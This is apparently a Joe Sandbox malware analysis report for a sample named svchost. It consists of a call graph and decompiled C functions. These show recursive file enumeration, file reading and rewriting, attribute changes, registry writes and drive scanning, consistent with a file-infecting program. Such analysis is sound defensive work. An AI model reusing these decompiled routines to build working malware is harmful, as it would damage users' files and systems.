10032->10033 10034 402468 11 API calls 10033->10034 10035 405d16 10033->10035 10034->10035 10035->9603 10037 4071d9 10036->10037 10038 406fe4 25 API calls 10037->10038 10039 407249 10038->10039 10040 407466 10039->10040 10145 404f34 10039->10145 10043 4030b8 11 API calls 10040->10043 10045 407483 10043->10045 10044 40312c 11 API calls 10047 40726d 10044->10047 10046 403094 11 API calls 10045->10046 10049 40748b 10046->10049 10048 404f90 26 API calls 10047->10048 10050 407278 10048->10050 10049->9608 10050->10040 10051 405008 26 API calls 10050->10051 10052 4072a9 10051->10052 10052->10040 10053 404f6c 2 API calls 10052->10053 10054 4072e3 10053->10054 10054->10040 10055 407130 15 API calls 10054->10055 10056 407301 10055->10056 10056->10040 10057 407315 GetFileAttributesA 10056->10057 10058 407327 SetFileAttributesA 10057->10058 10059 40732f 10057->10059 10058->10059 10150 405bdc 10059->10150 10067 407352 10068 404b68 CreateFileA 10067->10068 10069 407399 10068->10069 10070 407448 10069->10070 10071 404bc4 ReadFile 10069->10071 10171 404b90 CloseHandle 10070->10171 10073 4073b6 10071->10073 10073->10070 10166 404bb4 SetFilePointer 10073->10166 10074 40744f 10074->10040 10075 407457 10074->10075 10077 407460 SetFileAttributesA 10075->10077 10077->10040 10078 4073d7 10079 404bc4 ReadFile 10078->10079 10080 4073e9 10079->10080 10167 404bb4 SetFilePointer 10080->10167 10082 40741a 10168 404be0 WriteFile 10082->10168 10086 407436 10087 404be0 WriteFile 10086->10087 10087->10070 10089 407145 10088->10089 10090 404b68 CreateFileA 10089->10090 10091 407160 10090->10091 10092 407167 10091->10092 10371 404bb4 SetFilePointer 10091->10371 10095 403094 11 API calls 10092->10095 10094 407179 10096 404bc4 ReadFile 10094->10096 10097 4071be 10095->10097 10098 40718b 10096->10098 10097->9608 10372 404b90 CloseHandle 10098->10372 10101 404b68 CreateFileA 10100->10101 10102 405e5d 10101->10102 10110 405e8e 10102->10110 10373 405d30 10102->10373 10104 405e6c 10105 404be0 WriteFile 10104->10105 10106 405e7d SetEndOfFile 10105->10106 10377 404b90 CloseHandle 10106->10377 10108 405e89 10109 4044a8 11 API calls 10108->10109 10109->10110 10110->9610 10112 404494 GetFileAttributesA 10111->10112 10112->10014 10116 4027a0 10113->10116 10115 4044fd 10115->9591 10117 4027a5 10116->10117 10118 4027a6 10116->10118 10117->10115 10119 4027e7 10118->10119 10120 402448 25 API calls 10118->10120 10119->10115 10121 4027b8 10120->10121 10121->10115 10122->10027 10124 405e98 10123->10124 10126 405e9e 10123->10126 10136 405cbc 10124->10136 10127 405f12 10126->10127 10128 402448 25 API calls 10126->10128 10127->10029 10130 405ec2 10128->10130 10129 405ef4 10129->10127 10142 40456c 10129->10142 10130->10129 10132 402468 11 API calls 10130->10132 10132->10129 10134 403094 11 API calls 10133->10134 10135 4044b4 10134->10135 10135->10031 10137 405cc1 10136->10137 10138 405ccf 10137->10138 10139 405cec 11 API calls 10137->10139 10140 405ce0 10138->10140 10141 402468 11 API calls 10138->10141 10139->10137 10140->10126 10141->10140 10143 4044f8 25 API calls 10142->10143 10144 404579 10143->10144 10144->10127 10146 40340c 10145->10146 10147 404f51 GetShortPathNameA 10146->10147 10148 403184 25 API calls 10147->10148 10149 404f62 10148->10149 10149->10044 10172 4059a8 10150->10172 10152 405be6 10153 4064cc 10152->10153 10154 4044f8 25 API calls 10153->10154 10155 4064d9 10154->10155 10156 406ca8 10155->10156 10175 4064e4 10156->10175 10158 406cb8 10159 406cc0 ExtractIconA 10158->10159 10160 406cd1 10159->10160 10161 406cd9 10159->10161 10179 406520 10160->10179 10163 406510 10161->10163 10188 406b48 10163->10188 10166->10078 10167->10082 10169 404bf4 10168->10169 10170 404bb4 SetFilePointer 10169->10170 10170->10086 10171->10074 10173 4044f8 25 API calls 10172->10173 10174 4059b9 10173->10174 10174->10152 10176 4064f9 10175->10176 10177 4064eb 10175->10177 10176->10158 10177->10176 10178 4064f1 DestroyCursor 10177->10178 10178->10176 10180 406579 10179->10180 10181 40652e 10179->10181 10180->10161 10182 4064e4 DestroyCursor 10181->10182 10183 406535 10182->10183 10183->10180 10184 40653e GetIconInfo GetObjectA 10183->10184 10185 406565 DeleteObject 10184->10185 10186 40656b 10184->10186 10185->10186 10186->10180 10187 406573 DeleteObject 10186->10187 10187->10180 10193 406b74 10188->10193 10189 406c7b 10229 403b30 10189->10229 10193->10189 10200 403b24 10193->10200 10194 406c26 10203 406638 10194->10203 10196 406bf6 GetIconInfo 10196->10194 10196->10196 10198 406c3b 10198->10189 10199 406c6f DeleteObject 10198->10199 10199->10198 10235 403998 10200->10235 10204 406665 10203->10204 10205 40456c 25 API calls 10204->10205 10220 40685a 10204->10220 10206 406697 10205->10206 10299 405fd8 10206->10299 10209 405fd8 28 API calls 10218 4066af 10209->10218 10210 4066f3 GetObjectA 10212 406715 GetObjectA 10210->10212 10210->10218 10211 4068b1 GetObjectA 10228 406877 10211->10228 10212->10218 10213 406748 CopyImage 10304 4061e0 10213->10304 10215 406761 10309 406154 10215->10309 10218->10210 10218->10213 10219 406218 71 API calls 10218->10219 10218->10220 10218->10228 10219->10218 10220->10198 10221 406970 CopyImage 10224 4061e0 13 API calls 10221->10224 10222 4069f4 CopyImage 10223 4061e0 13 API calls 10222->10223 10223->10228 10224->10228 10225 406a89 CopyImage 10226 4061e0 13 API calls 10225->10226 10226->10228 10227 406218 71 API calls 10227->10228 10228->10211 10228->10220 10228->10221 10228->10222 10228->10225 10228->10227 10230 403b36 10229->10230 10234 403b68 10229->10234 10231 403b60 10230->10231 10230->10234 10330 40364c 10230->10330 10232 402468 11 API calls 10231->10232 10232->10234 10234->10067 10236 4039b7 10235->10236 10240 4039d1 10235->10240 10237 4039c2 10236->10237 10238 402530 11 API calls 10236->10238 10249 403990 10237->10249 10238->10237 10242 403a1b 10240->10242 10243 402530 11 API calls 10240->10243 10241 4039cc 10241->10194 10241->10196 10244 402448 25 API calls 10242->10244 10245 403a28 10242->10245 10243->10242 10246 403a67 10244->10246 10245->10241 10248 403998 29 API calls 10245->10248 10246->10245 10252 403978 10246->10252 10248->10245 10250 403b30 13 API calls 10249->10250 10251 403995 10250->10251 10251->10241 10255 40386c 10252->10255 10254 403983 10254->10245 10256 403881 10255->10256 10272 4038a7 10255->10272 10258 403886 10256->10258 10262 4038c9 10256->10262 10257 4030e8 25 API calls 10257->10272 10260 40388b 10258->10260 10261 4038dd 10258->10261 10264 403890 10260->10264 10265 4038f1 10260->10265 10268 4038c4 10261->10268 10281 403738 10261->10281 10262->10268 10274 4035dc 10262->10274 10266 403912 10264->10266 10267 403895 10264->10267 10265->10268 10269 40386c 29 API calls 10265->10269 10266->10268 10286 403750 10266->10286 10267->10268 10271 403943 10267->10271 10267->10272 10268->10254 10269->10265 10271->10268 10295 403b6c 10271->10295 10272->10257 10272->10268 10275 4035a0 10274->10275 10276 403598 10274->10276 10277 4035b4 10275->10277 10278 4035a6 SysFreeString 10275->10278 10276->10274 10276->10275 10279 4035ef SysReAllocStringLen 10276->10279 10277->10262 10278->10277 10279->10276 10280 4035ff 10279->10280 10280->10262 10282 403741 10281->10282 10283 403748 10281->10283 10282->10261 10284 402530 11 API calls 10283->10284 10285 40374f 10284->10285 10285->10261 10293 40376a 10286->10293 10287 4030e8 25 API calls 10287->10293 10288 4035dc 2 API calls 10288->10293 10289 403738 11 API calls 10289->10293 10290 40386c 29 API calls 10290->10293 10291 403856 10291->10266 10292 403750 29 API calls 10292->10293 10293->10287 10293->10288 10293->10289 10293->10290 10293->10291 10293->10292 10294 403b6c 13 API calls 10293->10294 10294->10293 10296 403b73 10295->10296 10297 403b30 13 API calls 10296->10297 10298 403b8d 10296->10298 10297->10298 10298->10271 10315 405fb4 10299->10315 10302 40600a 10302->10209 10303 405feb 72E7AC50 72E7A520 72E7B380 10303->10302 10318 406068 10304->10318 10307 406202 10307->10215 10308 4061ea GetObjectA 10308->10307 10310 406162 10309->10310 10311 406173 72E7AC50 72E7A7A0 72E7B380 10310->10311 10313 4061c2 GetObjectA 10310->10313 10312 4061a8 10311->10312 10311->10313 10312->10313 10314 402468 11 API calls 10312->10314 10313->10218 10314->10313 10316 4044f8 25 API calls 10315->10316 10317 405fc7 10316->10317 10317->10302 10317->10303 10319 40606e 10318->10319 10322 406024 10319->10322 10321 406075 10321->10307 10321->10308 10323 40602a 10322->10323 10324 406031 DeleteObject 10323->10324 10325 40603c 10323->10325 10324->10325 10326 406047 10325->10326 10327 402468 11 API calls 10325->10327 10328 402468 11 API calls 10326->10328 10329 406054 10326->10329 10327->10326 10328->10329 10329->10321 10331 403655 10330->10331 10352 40368a 10330->10352 10332 40366a 10331->10332 10333 40368f 10331->10333 10334 4036ac 10332->10334 10335 40366e 10332->10335 10336 4036a0 10333->10336 10337 403696 10333->10337 10338 4036b3 10334->10338 10339 4036ba 10334->10339 10340 403672 10335->10340 10341 4036c3 10335->10341 10343 4030b8 11 API calls 10336->10343 10342 403094 11 API calls 10337->10342 10355 4035a0 10338->10355 10358 4035b8 10339->10358 10346 4036d2 10340->10346 10347 403676 10340->10347 10341->10352 10362 403634 10341->10362 10342->10352 10343->10352 10350 40364c 13 API calls 10346->10350 10346->10352 10349 4036f0 10347->10349 10354 40367a 10347->10354 10349->10352 10367 403600 10349->10367 10350->10346 10352->10231 10353 403b30 13 API calls 10353->10354 10354->10352 10354->10353 10356 4035b4 10355->10356 10357 4035a6 SysFreeString 10355->10357 10356->10352 10357->10356 10359 4035be 10358->10359 10360 4035c4 SysFreeString 10359->10360 10361 4035d6 10359->10361 10360->10359 10361->10352 10363 403644 10362->10363 10364 40363d 10362->10364 10365 402530 11 API calls 10363->10365 10364->10341 10366 40364b 10365->10366 10366->10341 10368 403612 10367->10368 10369 40364c 13 API calls 10368->10369 10370 40362b 10368->10370 10369->10368 10370->10349 10371->10094 10372->10092 10375 405d3b 10373->10375 10374 403184 25 API calls 10376 405d5f 10374->10376 10375->10374 10376->10104 10377->10108 10379 404f24 10378->10379 10380 4031c4 25 API calls 10379->10380 10381 404f30 10380->10381 10382 404700 10381->10382 10383 4030e8 25 API calls 10382->10383 10384 404708 10383->10384 10385 40345c 25 API calls 10384->10385 10386 40470e 10385->10386 10386->9622 10388 40325c 10387->10388 10389 4032bd 10387->10389 10390 403264 10388->10390 10391 4030e8 10388->10391 10390->10389 10392 403273 10390->10392 10396 4030e8 25 API calls 10390->10396 10395 403158 25 API calls 10391->10395 10397 4030fc 10391->10397 10394 403158 25 API calls 10392->10394 10393 40312a 10393->9624 10399 40328d 10394->10399 10395->10397 10396->10392 10397->10393 10398 402468 11 API calls 10397->10398 10398->10393 10400 4030e8 25 API calls 10399->10400 10401 4032b9 10400->10401 10401->9624 10403 407bdd 10402->10403 10404 406fe4 25 API calls 10403->10404 10408 407c35 10404->10408 10405 407d6c 10406 403094 11 API calls 10405->10406 10407 407d84 10406->10407 10409 403094 11 API calls 10407->10409 10408->10405 10433 407ad0 10408->10433 10410 407d8c 10409->10410 10410->9633 10412 407c61 10413 407130 15 API calls 10412->10413 10414 407c69 10413->10414 10414->10405 10415 407c71 10414->10415 10416 407c79 GetFileAttributesA 10415->10416 10417 407c95 10416->10417 10418 407c8d SetFileAttributesA 10416->10418 10451 405b84 10417->10451 10418->10417 10420 407c9d 10420->9633 10422 406f5c 10421->10422 10423 403094 11 API calls 10421->10423 10424 404ae8 27 API calls 10422->10424 10423->10422 10427 406f75 10424->10427 10425 406fa0 10428 403534 25 API calls 10425->10428 10426 4049d0 27 API calls 10426->10427 10427->10425 10427->10426 10429 4032cc 25 API calls 10427->10429 10430 406fb1 10428->10430 10429->10427 10431 403094 11 API calls 10430->10431 10432 406fc6 10431->10432 10432->9638 10434 407ae6 10433->10434 10435 405c80 25 API calls 10434->10435 10436 407af9 10435->10436 10437 404f90 26 API calls 10436->10437 10438 407b12 10437->10438 10439 403214 25 API calls 10438->10439 10440 407b31 10439->10440 10441 405e04 29 API calls 10440->10441 10443 407b3c 10441->10443 10442 407b55 10445 404f90 26 API calls 10442->10445 10443->10442 10458 405cac 10443->10458 10446 407b5d 10445->10446 10447 403214 25 API calls 10446->10447 10448 407b7c 10447->10448 10449 405e50 29 API calls 10448->10449 10450 407b87 10449->10450 10450->10412 10452 4059a8 25 API calls 10451->10452 10453 405b93 10452->10453 10454 404b9c GetFileAttributesA 10453->10454 10455 405bb6 10454->10455 10456 404b68 CreateFileA 10455->10456 10457 405bd1 10456->10457 10457->10420 10461 405dc4 10458->10461 10460 405cb7 10460->10442 10462 405dd4 10461->10462 10463 405dcf 10461->10463 10465 402448 25 API calls 10462->10465 10464 40456c 25 API calls 10463->10464 10464->10462 10466 405de5 10465->10466 10466->10460 10468 4031c4 25 API calls 10467->10468 10469 404c27 10468->10469 10470 404b68 CreateFileA 10469->10470 10471 404c34 10470->10471 10472 404c50 10471->10472 10473 404be0 WriteFile 10471->10473 10475 403094 11 API calls 10472->10475 10474 404c47 10473->10474 10489 404b90 CloseHandle 10474->10489 10477 404c65 10475->10477 10477->9661 10479 40340c 10478->10479 10480 405772 RegOpenKeyExA 10479->10480 10481 40577d 10480->10481 10481->9664 10483 4057c0 10482->10483 10484 405799 10482->10484 10486 4057cc 10483->10486 10485 4057b5 RegSetValueExA 10484->10485 10485->10483 10487 4057d0 RegCloseKey 10486->10487 10488 4057d6 10486->10488 10487->10488 10488->9659 10489->10472 10491 405008 26 API calls 10490->10491 10492 406ebb 10491->10492 10493 403214 25 API calls 10492->10493 10494 406eda 10493->10494 10495 404c78 28 API calls 10494->10495 10496 406eef 10495->10496 10497 406ef3 10496->10497 10498 406f07 10496->10498 10534 4057d8 GetLocalTime 10497->10534 10501 4030b8 11 API calls 10498->10501 10500 406ef8 10500->10498 10502 406f21 10501->10502 10502->9673 10503->9677 10507 406d93 10504->10507 10505 406de3 10508 403094 11 API calls 10505->10508 10506 406d79 GetDriveTypeA 10506->10507 10507->10505 10507->10506 10510 4031b4 25 API calls 10507->10510 10511 403214 25 API calls 10507->10511 10509 406dfb 10508->10509 10509->9684 10510->10507 10511->10507 10513 4074cd 10512->10513 10536 4052ac 10513->10536 10515 4074fa 10516 407569 10515->10516 10518 405338 25 API calls 10515->10518 10520 403258 25 API calls 10515->10520 10521 4074b4 112 API calls 10515->10521 10522 4071d0 108 API calls 10515->10522 10517 4030b8 11 API calls 10516->10517 10519 40758a 10517->10519 10518->10515 10519->9684 10520->10515 10521->10515 10522->10515 10524 4057d8 GetLocalTime 10523->10524 10525 406e2d 10524->10525 10526 405008 26 API calls 10525->10526 10527 406e39 10526->10527 10528 403214 25 API calls 10527->10528 10529 406e58 10528->10529 10530 404bf8 28 API calls 10529->10530 10531 406e6d 10530->10531 10532 4030b8 11 API calls 10531->10532 10533 406e87 ReleaseMutex 10532->10533 10533->9672 10535 4057f0 10534->10535 10535->10500 10537 4044f8 25 API calls 10536->10537 10538 4052c3 10537->10538 10541 405634 10538->10541 10540 4052d1 10540->10515 10567 4052d8 10541->10567 10544 40456c 25 API calls 10545 405646 10544->10545 10546 4030e8 25 API calls 10545->10546 10547 405653 10546->10547 10548 404db8 25 API calls 10547->10548 10550 405746 10547->10550 10549 40566a 10548->10549 10551 405c80 25 API calls 10549->10551 10561 405699 10549->10561 10550->10540 10556 405676 10551->10556 10553 4056bc 10554 403258 25 API calls 10553->10554 10555 4056ca 10554->10555 10557 4044a8 11 API calls 10555->10557 10559 405cac 25 API calls 10556->10559 10558 4056cf FindFirstFileA 10557->10558 10560 403094 11 API calls 10558->10560 10559->10561 10566 4056e5 10560->10566 10571 405300 10561->10571 10563 405735 FindNextFileA 10564 405740 FindClose 10563->10564 10563->10566 10564->10550 10565 402448 25 API calls 10565->10566 10566->10550 10566->10563 10566->10565 10579 40536c 10566->10579 10568 4052e5 10567->10568 10569 4052df 10567->10569 10568->10544 10590 40458c 10569->10590 10572 4030e8 25 API calls 10571->10572 10576 403184 10572->10576 10573 405319 10573->10553 10574 403158 25 API calls 10575 403194 10574->10575 10577 403094 11 API calls 10575->10577 10576->10573 10576->10574 10578 4031ac 10577->10578 10578->10553 10582 4053ca 10579->10582 10580 4030b8 11 API calls 10581 405610 10580->10581 10581->10566 10583 4031c4 25 API calls 10582->10583 10586 405553 10582->10586 10588 405419 10582->10588 10583->10588 10584 4055a1 10585 4031c4 25 API calls 10584->10585 10584->10586 10585->10586 10586->10580 10587 4031c4 25 API calls 10587->10588 10588->10584 10588->10586 10588->10587 10589 404894 26 API calls 10588->10589 10589->10588 10591 4045ac 10590->10591 10592 404590 10590->10592 10591->10568 10592->10591 10593 402468 11 API calls 10592->10593 10593->10592

                                                                          Executed Functions

                                                                          Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 267 405634-405659 call 4052d8 call 40456c call 4030e8 274 40574c-405759 call 404520 267->274 275 40565f-40566f call 404db8 267->275 280 405671-40568a call 405c80 call 4048d8 275->280 281 4056a9-4056e7 call 405300 call 403258 call 4044a8 FindFirstFileA call 403094 275->281 290 405691-405699 call 405cac 280->290 291 40568c 280->291 298 405746 281->298 299 4056e9-4056fc call 40536c 281->299 290->281 291->290 298->274 302 405735-40573e FindNextFileA 299->302 303 4056fe-405701 299->303 302->299 304 405740-405741 FindClose 302->304 305 405703-405713 303->305 306 405717-405730 call 402448 call 4045e8 call 40254c 303->306 304->298 305->302 310 405715 305->310 306->302 310->298 310->306
                                                                          C-Code - Quality: 61%
                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v292;
				char _v336;
				void* __ebx;
				void* __edi;
				void* __ebp;
				CHAR* _t38;
				void* _t39;
				void* _t44;
				int _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				struct _WIN32_FIND_DATAA* _t87;

				_t85 = __esi;
				_t70 = __edx;
				_t61 = __ecx;
				_t60 = __eax;
				asm("pushad");
				E004052D8(__eax);
				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
				asm("popad");
				asm("pushad");
				_t2 = _t60 + 0x1c; // 0x1c
				E004030E8(_t2, _t70);
				asm("popad");
				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
					asm("pushad");
					_t4 = _t60 + 0x1c; // 0x1c
					E00404DB8( *_t4, _t4);
					_t32 =  *((intOrPtr*)(_t60 + 0x20));
					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
						_t56 = E00405C80();
						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
						asm("popad");
						asm("pushad");
						_t57 = _t61;
						_t61 = _t56;
						_t58 = E004048D8(_t57, _t56, 0x40569b);
						_t82 = _t61;
						if(_t58 == 0) {
							_t82 = E004056A7;
						}
						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
					}
					asm("popad");
					_t87 = _t86 + 0xfffffec0;
					_push(0);
					_push(0);
					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
					_pop(_t63);
					E00403258( &_v336, _t63,  *((intOrPtr*)(_t60 + 0x1c)));
					E004044A8();
					_t38 = _t63;
					_push(_t38);
					_t39 = FindFirstFileA(_t38, _t87); // executed
					_t84 = _t39;
					asm("pushfd");
					E00403094(_t87);
					asm("popfd");
					if(_t39 + 1 != 0) {
						do {
							_t44 = E0040536C(_t60, _t60, _v336,  &_v292, _t84, _t85, _a4); // executed
							if(_t44 != 0) {
								asm("jecxz 0x16");
								 *((intOrPtr*)(_t60 + 0x24))(_t87, 1);
								asm("jecxz 0x22");
								asm("loop 0x31");
								_push(E00402448(0x140));
								E004045E8( *((intOrPtr*)(_t60 + 0x18)), _t50);
								_pop(_t80);
								_t69 = 0x140;
								E0040254C(_t87, _t69, _t80);
							}
							_t45 = FindNextFileA(_t84, _t87); // executed
						} while (_t45 != 0);
						FindClose(_t84); // executed
					}
				}
				 *((intOrPtr*)(_t60 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t60 + 0x20)));
			}


























                                                                          0x00405634
                                                                          0x00405634
                                                                          0x00405634
                                                                          0x00405639
                                                                          0x0040563b
                                                                          0x0040563c
                                                                          0x00405646
                                                                          0x00405649
                                                                          0x0040564a
                                                                          0x0040564b
                                                                          0x0040564e
                                                                          0x00405653
                                                                          0x00405659
                                                                          0x0040565f
                                                                          0x00405660
                                                                          0x00405665
                                                                          0x0040566a
                                                                          0x0040566f
                                                                          0x00405671
                                                                          0x00405676
                                                                          0x00405679
                                                                          0x0040567a
                                                                          0x0040567c
                                                                          0x0040567c
                                                                          0x00405682
                                                                          0x00405689
                                                                          0x0040568a
                                                                          0x0040568c
                                                                          0x0040568c
                                                                          0x00405694
                                                                          0x00405694
                                                                          0x004056a9
                                                                          0x004056aa
                                                                          0x004056b2
                                                                          0x004056b3
                                                                          0x004056b7
                                                                          0x004056c3
                                                                          0x004056c5
                                                                          0x004056ca
                                                                          0x004056cf
                                                                          0x004056d2
                                                                          0x004056d5
                                                                          0x004056da
                                                                          0x004056df
                                                                          0x004056e0
                                                                          0x004056e5
                                                                          0x004056e7
                                                                          0x004056e9
                                                                          0x004056f5
                                                                          0x004056fc
                                                                          0x00405701
                                                                          0x0040570f
                                                                          0x00405713
                                                                          0x00405715
                                                                          0x00405722
                                                                          0x00405727
                                                                          0x0040572c
                                                                          0x0040572d
                                                                          0x00405730
                                                                          0x00405730
                                                                          0x00405737
                                                                          0x0040573c
                                                                          0x00405741
                                                                          0x00405741
                                                                          0x00405746
                                                                          0x0040574e
                                                                          0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID: *.*
                                                                          • API String ID: 3541575487-438819550
                                                                          • Opcode ID: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                          • Instruction ID: e0bf5d45d2763b4aada85c2368977cee553341535aa4efecd7ed3e039fa03a50
                                                                          • Opcode Fuzzy Hash: 00d3b479303e5d62243bd7637ae4d1c4a154d51cbac2d1721687722865f048cd
                                                                          • Instruction Fuzzy Hash: 513188B53005006BD705BF26998295B3799DFC5328B60847FB904EB2C7EA7DDC018E99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 384 4056a7-4056e7 call 405300 call 403258 call 4044a8 FindFirstFileA call 403094 394 405746-405759 call 404520 384->394 395 4056e9-4056fc call 40536c 384->395 401 405735-40573e FindNextFileA 395->401 402 4056fe-405701 395->402 401->395 403 405740-405741 FindClose 401->403 404 405703-405713 402->404 405 405717-405730 call 402448 call 4045e8 call 40254c 402->405 403->394 404->401 409 405715 404->409 405->401 409->394 409->405
                                                                          C-Code - Quality: 57%
                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t14;
				CHAR* _t20;
				void* _t21;
				void* _t29;
				int _t30;
				void* _t41;
				void* _t45;
				void* _t51;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				struct _WIN32_FIND_DATAA* _t68;

				_t64 = __esi;
				_t41 = __ebx;
				_t14 = __eax -  *__eax;
				asm("popad");
				_t68 = _t67 + 0xfffffec0;
				_push(0);
				_push(0);
				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
				_pop(_t45);
				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
				E004044A8();
				_t20 = _t45;
				_push(_t20);
				_t21 = FindFirstFileA(_t20, _t68); // executed
				_t62 = _t21;
				asm("pushfd");
				E00403094(_t68);
				asm("popfd");
				if(_t21 + 1 != 0) {
					do {
						_t29 = E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))); // executed
						if(_t29 != 0) {
							asm("jecxz 0x16");
							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
							asm("jecxz 0x22");
							asm("loop 0x31");
							_push(E00402448(0x140));
							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
							_pop(_t60);
							_t51 = 0x140;
							E0040254C(_t68, _t51, _t60);
						}
						_t30 = FindNextFileA(_t62, _t68); // executed
					} while (_t30 != 0);
					FindClose(_t62); // executed
				}
				 *((intOrPtr*)(_t41 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
			}
















                                                                          0x004056a7
                                                                          0x004056a7
                                                                          0x004056a7
                                                                          0x004056a9
                                                                          0x004056aa
                                                                          0x004056b2
                                                                          0x004056b3
                                                                          0x004056b7
                                                                          0x004056c3
                                                                          0x004056c5
                                                                          0x004056ca
                                                                          0x004056cf
                                                                          0x004056d2
                                                                          0x004056d5
                                                                          0x004056da
                                                                          0x004056df
                                                                          0x004056e0
                                                                          0x004056e5
                                                                          0x004056e7
                                                                          0x004056e9
                                                                          0x004056f5
                                                                          0x004056fc
                                                                          0x00405701
                                                                          0x0040570f
                                                                          0x00405713
                                                                          0x00405715
                                                                          0x00405722
                                                                          0x00405727
                                                                          0x0040572c
                                                                          0x0040572d
                                                                          0x00405730
                                                                          0x00405730
                                                                          0x00405737
                                                                          0x0040573c
                                                                          0x00405741
                                                                          0x00405741
                                                                          0x0040574e
                                                                          0x00405759

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1188821159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1188634524.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000002.00000002.1189771746.0000000000418000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                          • Opcode Fuzzy Hash: 4427aa859411e4304098e8c764b4f1325ec2cbe1500f1084358bf376df50b64d
                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 556 404f6c-404f7a FindFirstFileA 557 404f87-404f8d 556->557 558 404f7c-404f83 FindClose 556->558 558->557
                                                                          C-Code - Quality: 100%
                                                                          			E00404F6C(CHAR* __eax) {
				intOrPtr _v288;
				void* _t3;
				void* _t4;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(__eax, _t8); // executed
				_t4 = _t3 + 1;
				if(_t4 != 0) {
					FindClose(_t4 - 1); // executed
					return _v288;
				}
				return _t4;
			}







                                                                          0x00404f74
                                                                          0x00404f79
                                                                          0x00404f7a
                                                                          0x00404f7e
                                                                          0x00000000
                                                                          0x00404f83
                                                                          0x00404f8d

                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                          Memory Dump Source
